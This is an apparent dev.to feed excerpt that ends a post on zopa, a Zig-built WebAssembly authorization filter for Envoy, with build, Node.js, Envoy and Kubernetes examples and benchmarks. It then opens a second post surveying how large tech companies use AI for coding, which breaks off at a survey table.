&lt;p&gt;&lt;code&gt;call&lt;/code&gt; ships with these four builtins:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Name&lt;/th&gt;
&lt;th&gt;Args&lt;/th&gt;
&lt;th&gt;Returns&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;startswith&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;(string, string)&lt;/td&gt;
&lt;td&gt;bool&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;endswith&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;(string, string)&lt;/td&gt;
&lt;td&gt;bool&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;contains&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;(string, string)&lt;/td&gt;
&lt;td&gt;bool&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;count&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;(array / set / object / string)&lt;/td&gt;
&lt;td&gt;number&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;&lt;code&gt;some&lt;/code&gt; / &lt;code&gt;every&lt;/code&gt; also iterate over JSON objects: pick &lt;code&gt;kind: "keys"&lt;/code&gt; (default) or &lt;code&gt;kind: "values"&lt;/code&gt;.&lt;/p&gt;
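
&lt;p&gt;The semantics map onto host-language one-liners; a JS sketch of the behavior described above (not zopa's implementation):&lt;/p&gt;

```javascript
// The four builtins, per the table above:
const builtins = {
  startswith: (s, prefix) => s.startsWith(prefix),
  endswith: (s, suffix) => s.endsWith(suffix),
  contains: (s, needle) => s.includes(needle),
  count: (x) =>
    typeof x === 'string' ? x.length
    : Array.isArray(x) ? x.length
    : Object.keys(x).length, // objects (and object-shaped sets) by key count
};

// some/every iterate a JSON object over kind "keys" (default) or "values".
function domain(obj, kind) {
  return kind === 'values' ? Object.values(obj) : Object.keys(obj);
}

console.log(builtins.startswith('/admin/users', '/admin')); // true
console.log(builtins.count({ a: 1, b: 2 }));                // 2
console.log(domain({ a: 1, b: 2 }, 'values'));              // [ 1, 2 ]
```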

&lt;p&gt;Zopa doesn't reach the full Rego (user-defined functions, &lt;code&gt;with&lt;/code&gt; clauses, partial evaluation, imports, etc.). The scope is "decide allow/deny at the edge". Full reference: &lt;a href="https://github.com/0-draft/zopa/blob/main/docs/ast.md" rel="noopener noreferrer"&gt;&lt;code&gt;docs/ast.md&lt;/code&gt;&lt;/a&gt;.&lt;/p&gt;

&lt;h2&gt;
  
  
  Try it
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Build
&lt;/h3&gt;

&lt;p&gt;You need Zig 0.16.0:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;brew &lt;span class="nb"&gt;install &lt;/span&gt;zig
git clone https://github.com/0-draft/zopa
&lt;span class="nb"&gt;cd &lt;/span&gt;zopa
zig build &lt;span class="nt"&gt;--release&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;small
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Drive it directly (Node.js)
&lt;/h3&gt;

&lt;p&gt;Call &lt;code&gt;evaluate(input, ast)&lt;/code&gt; without going through proxy-wasm. Useful as a smoke test before standing up Envoy.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight javascript"&gt;&lt;code&gt;&lt;span class="k"&gt;import&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="nx"&gt;readFileSync&lt;/span&gt; &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="k"&gt;from&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;node:fs&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

&lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="nx"&gt;instance&lt;/span&gt; &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;await&lt;/span&gt; &lt;span class="nx"&gt;WebAssembly&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;instantiate&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
  &lt;span class="nf"&gt;readFileSync&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;zig-out/bin/zopa.wasm&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
  &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="na"&gt;env&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
      &lt;span class="na"&gt;proxy_log&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="o"&gt;=&amp;gt;&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
      &lt;span class="na"&gt;proxy_get_buffer_bytes&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="o"&gt;=&amp;gt;&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
      &lt;span class="na"&gt;proxy_get_header_map_pairs&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="o"&gt;=&amp;gt;&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
      &lt;span class="na"&gt;proxy_get_header_map_value&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="o"&gt;=&amp;gt;&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
      &lt;span class="na"&gt;proxy_send_local_response&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="o"&gt;=&amp;gt;&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="p"&gt;}},&lt;/span&gt;
&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="nx"&gt;malloc&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;free&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;evaluate&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;memory&lt;/span&gt; &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;instance&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;exports&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

&lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;enc&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;new&lt;/span&gt; &lt;span class="nc"&gt;TextEncoder&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
&lt;span class="kd"&gt;function&lt;/span&gt; &lt;span class="nf"&gt;write&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;obj&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;bytes&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;enc&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;encode&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;JSON&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;stringify&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;obj&lt;/span&gt;&lt;span class="p"&gt;));&lt;/span&gt;
  &lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;ptr&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;malloc&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;bytes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;length&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
  &lt;span class="k"&gt;new&lt;/span&gt; &lt;span class="nc"&gt;Uint8Array&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;memory&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;buffer&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;ptr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;bytes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;length&lt;/span&gt;&lt;span class="p"&gt;).&lt;/span&gt;&lt;span class="nf"&gt;set&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;bytes&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
  &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nx"&gt;ptr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;bytes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;length&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nx"&gt;ip&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;il&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;write&lt;/span&gt;&lt;span class="p"&gt;({&lt;/span&gt; &lt;span class="na"&gt;user&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="na"&gt;role&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;admin&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt; &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="p"&gt;});&lt;/span&gt;
&lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nx"&gt;ap&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;al&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;write&lt;/span&gt;&lt;span class="p"&gt;({&lt;/span&gt;
  &lt;span class="na"&gt;type&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;compare&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="na"&gt;op&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;eq&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="na"&gt;left&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;  &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="na"&gt;type&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;ref&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;   &lt;span class="na"&gt;path&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;input&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;user&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;role&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="p"&gt;},&lt;/span&gt;
  &lt;span class="na"&gt;right&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="na"&gt;type&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;value&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="na"&gt;value&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;admin&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt; &lt;span class="p"&gt;},&lt;/span&gt;
&lt;span class="p"&gt;});&lt;/span&gt;

&lt;span class="nx"&gt;console&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;log&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nf"&gt;evaluate&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;ip&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;il&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;ap&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;al&lt;/span&gt;&lt;span class="p"&gt;));&lt;/span&gt; &lt;span class="c1"&gt;// 1 (allow)&lt;/span&gt;
&lt;span class="nf"&gt;free&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;ip&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt; &lt;span class="nf"&gt;free&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;ap&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The &lt;code&gt;proxy_*&lt;/code&gt; stubs in &lt;code&gt;env&lt;/code&gt; are there because proxy-wasm imports must resolve before the wasm module instantiates. &lt;code&gt;evaluate&lt;/code&gt; itself doesn't call into them, so dummies are fine.&lt;/p&gt;

&lt;h3&gt;
  
  
  As an Envoy proxy-wasm filter
&lt;/h3&gt;

&lt;p&gt;Drop the wasm into &lt;code&gt;http_filters&lt;/code&gt;. Two important fields: &lt;code&gt;vm_config&lt;/code&gt; and &lt;code&gt;configuration&lt;/code&gt;.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;http_filters&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;envoy.filters.http.wasm&lt;/span&gt;
    &lt;span class="na"&gt;typed_config&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;@type"&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt; &lt;span class="s"&gt;type.googleapis.com/envoy.extensions.filters.http.wasm.v3.Wasm&lt;/span&gt;
      &lt;span class="s"&gt;config&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;
        &lt;span class="na"&gt;configuration&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
          &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;@type"&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt; &lt;span class="s"&gt;type.googleapis.com/google.protobuf.StringValue&lt;/span&gt;
          &lt;span class="s"&gt;value&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;|&lt;/span&gt;
            &lt;span class="s"&gt;{"type":"module","rules":[&lt;/span&gt;
              &lt;span class="s"&gt;{"type":"rule","name":"allow","default":true,&lt;/span&gt;
               &lt;span class="s"&gt;"value":{"type":"value","value":false}},&lt;/span&gt;
              &lt;span class="s"&gt;{"type":"rule","name":"allow","body":[&lt;/span&gt;
                &lt;span class="s"&gt;{"type":"eq",&lt;/span&gt;
                 &lt;span class="s"&gt;"left":{"type":"ref","path":["input","method"]},&lt;/span&gt;
                 &lt;span class="s"&gt;"right":{"type":"value","value":"GET"}}]}&lt;/span&gt;
            &lt;span class="s"&gt;]}&lt;/span&gt;
        &lt;span class="na"&gt;vm_config&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
          &lt;span class="na"&gt;runtime&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;envoy.wasm.runtime.v8&lt;/span&gt;
          &lt;span class="na"&gt;code&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
            &lt;span class="na"&gt;local&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
              &lt;span class="na"&gt;filename&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;/etc/zopa/zopa.wasm&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;code&gt;configuration.value&lt;/code&gt; is the policy AST as JSON. The example reads "GET passes; everything else denies".&lt;/p&gt;

&lt;p&gt;A complete end-to-end sample lives in &lt;a href="https://github.com/0-draft/zopa/tree/main/examples/envoy" rel="noopener noreferrer"&gt;&lt;code&gt;examples/envoy/&lt;/code&gt;&lt;/a&gt;; &lt;code&gt;zig build test-envoy&lt;/code&gt; runs curl assertions against a real Envoy. CI exercises Node, wasmtime, and a real Envoy on every commit.&lt;/p&gt;

&lt;h3&gt;
  
  
  Container image
&lt;/h3&gt;

&lt;p&gt;There's also a distroless OCI image. Multi-arch (amd64 / arm64) and cosign keyless-signed.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;docker pull ghcr.io/0-draft/zopa:v0.2.0
docker run &lt;span class="nt"&gt;--rm&lt;/span&gt; &lt;span class="nt"&gt;--entrypoint&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nb"&gt;ls &lt;/span&gt;ghcr.io/0-draft/zopa:v0.2.0 &lt;span class="nt"&gt;-lh&lt;/span&gt; /zopa.wasm
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The intended use is an initContainer that stages &lt;code&gt;/zopa.wasm&lt;/code&gt; into a volume shared with the Envoy sidecar.&lt;/p&gt;
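&lt;p&gt;A sketch of that wiring as a Kubernetes pod fragment. Everything here is illustrative: the Envoy image tag, the mount paths, and the assumption that the zopa image carries a &lt;code&gt;cp&lt;/code&gt; binary (the &lt;code&gt;ls&lt;/code&gt; invocation above suggests basic tools are present, but verify against the image you pull):&lt;/p&gt;

```yaml
# Illustrative pod fragment: an initContainer copies /zopa.wasm into a
# shared emptyDir that the Envoy sidecar mounts at /etc/zopa.
spec:
  initContainers:
    - name: stage-zopa
      image: ghcr.io/0-draft/zopa:v0.2.0
      command: ["cp", "/zopa.wasm", "/wasm/zopa.wasm"]  # assumes cp exists in the image
      volumeMounts:
        - name: wasm
          mountPath: /wasm
  containers:
    - name: envoy
      image: envoyproxy/envoy:v1.33-latest              # tag illustrative
      volumeMounts:
        - name: wasm
          mountPath: /etc/zopa                          # matches the filter's filename
          readOnly: true
  volumes:
    - name: wasm
      emptyDir: {}
```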

&lt;h3&gt;
  
  
  Latency
&lt;/h3&gt;

&lt;p&gt;&lt;code&gt;zig build bench&lt;/code&gt; runs a zopa-only latency benchmark. On a local M-series Mac with &lt;code&gt;--release=small&lt;/code&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;fixture                 |    p50 |    p95 |    p99 |   mean
------------------------+--------+--------+--------+-------
01_static               |  1.79  |  2.96  |  3.46  |  1.73  (μs)
02_header_eq            |  4.42  |  4.96  |  5.17  |  4.48  (μs)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Literal &lt;code&gt;true&lt;/code&gt; policy: 1.79 μs at p50. A simple &lt;code&gt;input.method == "GET"&lt;/code&gt; style compare: 4.42 μs at p50. Wall-clock direct measurement, 10 000 iterations after 1 000 warmup. No head-to-head against OPA / Cedar yet; cross-engine numbers wait until the conformance corpus is wide enough to honestly assert "same answer".&lt;/p&gt;

&lt;h2&gt;
  
  
  Where it sits relative to alternatives
&lt;/h2&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Item&lt;/th&gt;
&lt;th&gt;OPA&lt;/th&gt;
&lt;th&gt;Cedar&lt;/th&gt;
&lt;th&gt;Casbin&lt;/th&gt;
&lt;th&gt;zopa&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Language&lt;/td&gt;
&lt;td&gt;Go&lt;/td&gt;
&lt;td&gt;Rust&lt;/td&gt;
&lt;td&gt;Go (+ ports)&lt;/td&gt;
&lt;td&gt;Zig&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Wasm distribution&lt;/td&gt;
&lt;td&gt;Yes (heavy)&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;Yes (~60 KB)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Memory model&lt;/td&gt;
&lt;td&gt;GC&lt;/td&gt;
&lt;td&gt;RC + arenas&lt;/td&gt;
&lt;td&gt;GC&lt;/td&gt;
&lt;td&gt;per-request arena&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;proxy-wasm&lt;/td&gt;
&lt;td&gt;Side project&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;First-class&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Policy input&lt;/td&gt;
&lt;td&gt;Rego source&lt;/td&gt;
&lt;td&gt;Cedar source&lt;/td&gt;
&lt;td&gt;CSV / source&lt;/td&gt;
&lt;td&gt;Compiled AST&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Maturity&lt;/td&gt;
&lt;td&gt;CNCF Graduated&lt;/td&gt;
&lt;td&gt;Stable&lt;/td&gt;
&lt;td&gt;Mature&lt;/td&gt;
&lt;td&gt;Alpha&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Zopa isn't a replacement for OPA when you need full Rego, the management plane, bundle distribution, partial evaluation, or the state API. Use OPA for those. Zopa solves a narrow case: "I can compile the policy elsewhere and just want to evaluate at the edge". For that case, the wasm binary is two orders of magnitude smaller than OPA's.&lt;/p&gt;

&lt;p&gt;It fits when "Rego-ish syntax, but OPA is too heavy" and "Cedar / Casbin can't go to wasm" line up at the same time.&lt;/p&gt;

&lt;h2&gt;
  
  
  Try it and tell me
&lt;/h2&gt;

&lt;p&gt;Zopa's source is 8 files under &lt;code&gt;src/&lt;/code&gt;, no deps outside stdlib, readable top to bottom. Sized so that if you want to change something, you can fork and rewrite.&lt;/p&gt;

&lt;p&gt;Feedback I'd love:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;"&lt;code&gt;tools/rego2ast.py&lt;/code&gt; rejects my policy with Unsupported on this node, please add it"&lt;/li&gt;
&lt;li&gt;"proxy-wasm host X (Istio / Kong / APISIX) worked / didn't work like this"&lt;/li&gt;
&lt;li&gt;"Cases I'd add to the conformance corpus"&lt;/li&gt;
&lt;li&gt;"The &lt;code&gt;allow_body&lt;/code&gt; 64 KiB cap is too small / too large"&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  Reference
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;Repo: &lt;a href="https://github.com/0-draft/zopa" rel="noopener noreferrer"&gt;https://github.com/0-draft/zopa&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;Issues: &lt;a href="https://github.com/0-draft/zopa/issues" rel="noopener noreferrer"&gt;https://github.com/0-draft/zopa/issues&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;v0.2.0 release: &lt;a href="https://github.com/0-draft/zopa/releases/tag/v0.2.0" rel="noopener noreferrer"&gt;https://github.com/0-draft/zopa/releases/tag/v0.2.0&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;OCI image: &lt;code&gt;ghcr.io/0-draft/zopa:v0.2.0&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;proxy-wasm spec: &lt;a href="https://github.com/proxy-wasm/spec" rel="noopener noreferrer"&gt;https://github.com/proxy-wasm/spec&lt;/a&gt;
&lt;/li&gt;
&lt;/ul&gt;

</description>
      <category>webassembly</category>
      <category>authorization</category>
      <category>zig</category>
      <category>opensource</category>
    </item>
    <item>
      <title>What 11 big tech companies actually do with AI in 2026</title>
      <dc:creator>kt</dc:creator>
      <pubDate>Sat, 09 May 2026 12:40:10 +0000</pubDate>
      <link>https://dev.to/kanywst/what-11-big-tech-companies-actually-do-with-ai-in-2026-a-layered-numbers-first-breakdown-h58</link>
      <guid>https://dev.to/kanywst/what-11-big-tech-companies-actually-do-with-ai-in-2026-a-layered-numbers-first-breakdown-h58</guid>
      <description>&lt;h1&gt;
  
  
  Introduction
&lt;/h1&gt;

&lt;p&gt;I keep having this conversation lately, both inside and outside work.&lt;/p&gt;

&lt;p&gt;"How are you using AI?"&lt;br&gt;
"Mostly Claude Code and Cursor. Hooked our internal wiki up over MCP too."&lt;br&gt;
"Yeah, same here."&lt;/p&gt;

&lt;p&gt;That's where it stops. We can both say "the tools are installed" without flinching. But beyond that, the second you ask &lt;strong&gt;what actually changed, or how it shows up in any organizational number&lt;/strong&gt;, the answers thin out fast. Every engineer I know is using AI day to day, yet I rarely get the feeling that it's translated into anything visible at the team or company level.&lt;/p&gt;

&lt;p&gt;Meanwhile, when you read the news about companies that everyone agrees are good at this, the numbers are on a different scale. Google says &lt;strong&gt;75% of new code is AI-generated&lt;/strong&gt;. Stripe's internal coding agents merge &lt;strong&gt;1,300+ PRs a week&lt;/strong&gt;. Mercari reports &lt;strong&gt;95% of employees actively use AI tools&lt;/strong&gt; and that &lt;strong&gt;per-engineer output is up 64% year over year&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;What's behind that gap? What are these companies concretely doing, and what do they have that the rest of us don't? I went through the major IT companies (US and Japan) end to end and pulled this together as a single map.&lt;/p&gt;

&lt;p&gt;Everything below leans on first-party sources: official blogs, CEO statements, internal memos that went public, research workshop materials. Where I'm guessing, I say so. Where I don't know, I leave it out.&lt;/p&gt;

&lt;h3&gt;
  
  
  One thing to set up first: in 2026, Claude is the de facto standard for coding
&lt;/h3&gt;

&lt;p&gt;Before getting into individual companies, here's a piece of context worth front-loading. As of May 2026, &lt;strong&gt;Claude (Anthropic) dominates the coding-tool space by a wide margin&lt;/strong&gt;. The Pragmatic Engineer survey from February 2026 makes this concrete:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Tool&lt;/th&gt;
&lt;th&gt;Share naming it the "most loved coding tool"&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
